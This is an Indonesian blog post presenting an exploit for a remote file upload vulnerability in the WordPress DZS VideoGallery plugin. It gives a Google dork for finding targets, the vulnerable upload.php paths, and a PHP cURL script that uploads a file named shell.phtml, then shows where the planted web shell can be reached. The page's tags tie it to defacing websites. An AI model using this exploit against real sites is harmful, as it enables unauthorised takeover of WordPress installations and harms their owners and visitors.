WordPress DZS VideoGallery Plugins Remote File Upload Vulnerability

Leave a Comment
Assalamualaikum,

Nggak usah banyak cincong -_- langsung saja

# Exploit Title: WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
# Google dork:inurl:/wp-content/plugins/dzs-videogallery/
# Tested on : Windows/Linux
# Vulnerability "upload.php" : "not" or "not for direct access"


 Exploit :

/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/dzs-videogallery/upload.php

 <?php

$uploadfile="shell.phtml";
$ch = curl_init("localhost/wp-content/plugins/dzs-videogallery/admin/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('file_field'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
echo "$postResult";


?> 


localhost/wp-content/plugins/dzs-videogallery/admin/upload/shell.phtml
or
localhost/wp-content/plugins/dzs-videogallery/upload/shell.phtml


Sekian dan terima kasih, Wassalamualaikum wr.wb


Deface dengan DZS Video Gallery
Deface dengan Wordpress Video Gallery
Next PostPosting Lebih Baru Previous PostPosting Lama Beranda

0 komentar:

Posting Komentar

Diberdayakan oleh Blogger.